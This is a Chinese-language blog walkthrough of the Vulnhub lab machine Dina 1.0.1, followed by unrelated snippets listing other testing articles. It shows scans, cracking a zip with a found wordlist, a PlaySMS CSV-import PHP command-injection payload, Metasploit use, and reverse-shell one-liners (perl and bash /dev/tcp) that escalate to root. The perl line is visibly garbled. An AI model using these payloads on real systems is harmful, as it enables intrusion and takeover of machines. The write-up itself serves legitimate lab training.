靶机渗透测试(Dina: 1.0.1)

2023-11-10 08:11
文章标签 测试 1.0 渗透 靶机 dina

本文主要是介绍靶机渗透测试(Dina: 1.0.1),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

靶机渗透测试(Dina: 1.0.1):

Vulnhub靶机 Dina: 1.0.1
靶机:修改靶机的网络配置为桥接模式。
攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。
靶机难度:(Beginner (IF YOU STUCK ANYwhere PM me for HINT, But I don’t think need any help).
描述:/root/flag.txt



渗透流程:

1. 探测靶机ip地址(netdiscover -i eth0 -r 网关)

命令:netdiscover -i eth0 -r 192.168.10.0

靶机ip为: 192.168.10.133
在这里插入图片描述



2. nmap进行靶机端口服务扫描

命令: nmap -sS -Pn -A -p- -n 192.168.10.133

靶机只开放了80/http端口服务!(且存在robots目录
在这里插入图片描述



3. 根据端口服务进行信息收集(80/http端口)

访问80页面进行信息收集:

在这里插入图片描述
3.1. dirb目录扫描

我们使用kali中的dirb工具,对靶机页面进行目录扫描,可以看到爆破出来了敏感目录,例如:robots、tmp、uploads

在这里插入图片描述

我们首先访问robots页面,可以看到不被允许访问的页面有5项:

在这里插入图片描述
逐一访问页面,在nothing页面,看到不同(not found):

在这里插入图片描述

ctrl+u查看一波源代码:得到一份密码本(5个字符串)(备份保存

在这里插入图片描述


3.2. 访问/secure页面(访问非空目录)

继续访问其他敏感目录,在/secure页面得到一项zip文件:

在这里插入图片描述

我们使用kali下载下来,但解压时发现需要密码,这时刚刚nothing页面得到的密码本就可以排上用场了,我们使用密码本爆破,得到密码:freedom

在这里插入图片描述

成功解压,发现文件是mp3文件,但文件已经损坏,无法播放!!!

在这里插入图片描述

我们直接使用记事本打开(或者kali终端直接cat查看),在MP3文件中得到一项url地址:/SecreTSMSgatwayLogin(且给出了账号为touhid

在这里插入图片描述



4. 信息收集(Playsms框架)

访问得到的url地址:(可以看到为Playsms框架)

用户名/密码: touhid /// diana
密码仍然为使用密码本爆破

登陆成功!

在这里插入图片描述
我们使用kali直接先search一波,查看下框架版本信息:
searchsploit playsms:

在这里插入图片描述
cat查看42044.txt文件,按照文档说明,我们可以生成一个csv文件,抓包传参;文档中给出了上传的脚本和信息,可以在user-agent中执行命令;

在这里插入图片描述
那么我们就可以在playsms框架上寻找到可以upload(文件上传)的地址,上传CSV文件,利用burp抓包修改参数,从而getshell;



5. Getshell(漏洞利用)

方式一. exp漏洞利用

使用msf查看框架漏洞:
打开msf:
search playsms:

在这里插入图片描述

show options 查看配置信息
使用set命令设置配置信息:

set PASSWORD diana
set USERNAME touhid
set TARGETURI SecreTSMSgatwayLogin (TARGETURI是上传文件页面的URI)
set RHOST 192.168.10.133(靶机ip)
set LHOST 192.168.10.9(kali监听机的ip)
set LPORT 1234(kali监听的端口)

在这里插入图片描述

成功获得meterpreter,输入shell:

在这里插入图片描述
使用sudo -l命令查看可提权文件,发现可以执行perl命令,(所有用户均可以执行)
通过perl写入反向shell语句,命令如下:

sudo perl -e ‘use Socket; i = " 192.168.10.9 " ; i="192.168.10.9"; i="192.168.10.9";p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in( p , i n e t a t o n ( p,inet_aton( p,inetaton(i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};’

在这里插入图片描述

因为我们前面在得到meterpreter时,已经监听了4444端口,所以本次不能再重复使用,否则会报错4444端口已经被占用!

在这里插入图片描述

nc监听1234端口,成功获取到目标机器shell,whoami查看为root管理员权限,进行root/flag.txt查看:得到flag。
实验成功!!!

在这里插入图片描述
方式二 . 利用漏洞建立反弹shell(命令执行漏洞)

查看Import File的漏洞文档,发现文档中给出了利用方法:

需要在导入的 CSV 文件中填入以下内容:

name:<?php $t=$_SERVER['HTTP_USER_AGENT']; system($t); ?>
mobile:22

此时导入该 CSV文件,抓包修改User-Agent的值为任意命令,即可执行。

Phonebook板块有一个导入文件并识别CSV文件内容的功能,即导入一个测试文件,页面会回显文件内容:

在这里插入图片描述

在这里插入图片描述

导入csv文件,然后抓包,尝试修改User-Agent,结果会返回执行结果:

在这里插入图片描述
当然我们也可以直接修改NAME值,然后直接键入php提权命令:
在这里插入图片描述

因此我们就可以建立反弹shell并提权:
修改User-Agent为创建反弹shell的命令:

echo ‘bash -i>&/dev/tcp/192.168.10.9/1234 0>&1’ | bash

kali上监听1234端口,再次发包即可得到getshell;

成功反弹shell!!!(提权部分与上文相同,也可以使用脏牛提权,靶机下载dirty.c脚本,gcc编译,修改passwd文件,切换用户,成功提权!)

在这里插入图片描述



实验总结:

在本次实验中信息搜集得到仅开放的80端口,以及对robots协议的了解和robots目录下的不被允许访问的目录;

访问robots文件得到密码本,为后续解开mp3压缩包文件提供了很有利的帮助,在MP3文件损坏后,及时使用记事本查看,得到了playSMS登陆地址与用户名;

利用给出的用户名和robots文件中的密码进入系统,发现两处命令执行漏洞;

提权部分,我们可以使用手工利用和使用MSF利用漏洞,以及脏牛提权。

在实验中,CVS上传漏洞是本次的新颖知识!!!


参考博客:
https://blog.csdn.net/qq_43968080/article/details/105351336

这篇关于靶机渗透测试(Dina: 1.0.1)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/381427

相关文章

性能测试介绍

性能测试是一种测试方法,旨在评估系统、应用程序或组件在现实场景中的性能表现和可靠性。它通常用于衡量系统在不同负载条件下的响应时间、吞吐量、资源利用率、稳定性和可扩展性等关键指标。 为什么要进行性能测试 通过性能测试,可以确定系统是否能够满足预期的性能要求,找出性能瓶颈和潜在的问题,并进行优化和调整。 发现性能瓶颈:性能测试可以帮助发现系统的性能瓶颈,即系统在高负载或高并发情况下可能出现的问题

字节面试 | 如何测试RocketMQ、RocketMQ?

字节面试:RocketMQ是怎么测试的呢? 答: 首先保证消息的消费正确、设计逆向用例,在验证消息内容为空等情况时的消费正确性; 推送大批量MQ,通过Admin控制台查看MQ消费的情况,是否出现消费假死、TPS是否正常等等问题。(上述都是临场发挥,但是RocketMQ真正的测试点,还真的需要探讨) 01 先了解RocketMQ 作为测试也是要简单了解RocketMQ。简单来说,就是一个分

【测试】输入正确用户名和密码,点击登录没有响应的可能性原因

目录 一、前端问题 1. 界面交互问题 2. 输入数据校验问题 二、网络问题 1. 网络连接中断 2. 代理设置问题 三、后端问题 1. 服务器故障 2. 数据库问题 3. 权限问题: 四、其他问题 1. 缓存问题 2. 第三方服务问题 3. 配置问题 一、前端问题 1. 界面交互问题 登录按钮的点击事件未正确绑定,导致点击后无法触发登录操作。 页面可能存在

业务中14个需要进行A/B测试的时刻[信息图]

在本指南中,我们将全面了解有关 A/B测试 的所有内容。 我们将介绍不同类型的A/B测试,如何有效地规划和启动测试,如何评估测试是否成功,您应该关注哪些指标,多年来我们发现的常见错误等等。 什么是A/B测试? A/B测试(有时称为“分割测试”)是一种实验类型,其中您创建两种或多种内容变体——如登录页面、电子邮件或广告——并将它们显示给不同的受众群体,以查看哪一种效果最好。 本质上,A/B测

Verybot之OpenCV应用一:安装与图像采集测试

在Verybot上安装OpenCV是很简单的,只需要执行:         sudo apt-get update         sudo apt-get install libopencv-dev         sudo apt-get install python-opencv         下面就对安装好的OpenCV进行一下测试,编写一个通过USB摄像头采

BIRT 报表的自动化测试

来源:http://www.ibm.com/developerworks/cn/opensource/os-cn-ecl-birttest/如何为 BIRT 报表编写自动化测试用例 BIRT 是一项很受欢迎的报表制作工具,但目前对其的测试还是以人工测试为主。本文介绍了如何对 BIRT 报表进行自动化测试,以及在实际项目中的一些测试实践,从而提高了测试的效率和准确性 -------

可测试,可维护,可移植:上位机软件分层设计的重要性

互联网中,软件工程师岗位会分前端工程师,后端工程师。这是由于互联网软件规模庞大,从业人员众多。前后端分别根据各自需求发展不一样的技术栈。那么上位机软件呢?它规模小,通常一个人就能开发一个项目。它还有必要分前后端吗? 有必要。本文从三个方面论述。分别是可测试,可维护,可移植。 可测试 软件黑盒测试更普遍,但很难覆盖所有应用场景。于是有了接口测试、模块化测试以及单元测试。都是通过降低测试对象

day45-测试平台搭建之前端vue学习-基础4

目录 一、生命周期         1.1.概念         1.2.常用的生命周期钩子         1.3.关于销毁Vue实例         1.4.原理​编辑         1.5.代码 二、非单文件组件         2.1.组件         2.2.使用组件的三大步骤         2.3.注意点         2.4.关于VueComponen

如何成为一个优秀的测试工程师

链接地址:http://blog.csdn.net/KerryZhu/article/details/5250504 我一直在想,如何将自己的测试团队打造成世界一流的团队?流程、测试自动化、创新、扁平式管理、国际标准制定、测试社区贡献、…… 但首先一点是明确的,就是要将每一个测试工程师打造成优秀的测试工程师,优秀的团队必须由优秀的成员构成。所以,先讨论“如何成为一个优秀的测试工程师”,

python自动化测试框架--RobotFramework

为什么需要测试框架 在测试中,经常会为了怎样做测试、使用什么测试工具、如何使用、为什么使用测试工具、使用测试工具能帮助到我们什么等等问题而纠结。当我们选择一项测试工具时,如何组织大量自动化用例;如何合理的进行初始化清除;如何批量筛选待执行的用例;如何输出清晰的测试报告,就是需要我们考虑的事情了。下面简单介绍个使用比较广泛的自动化测试框架,即Robotframework。 RF的特点 RF:由pyt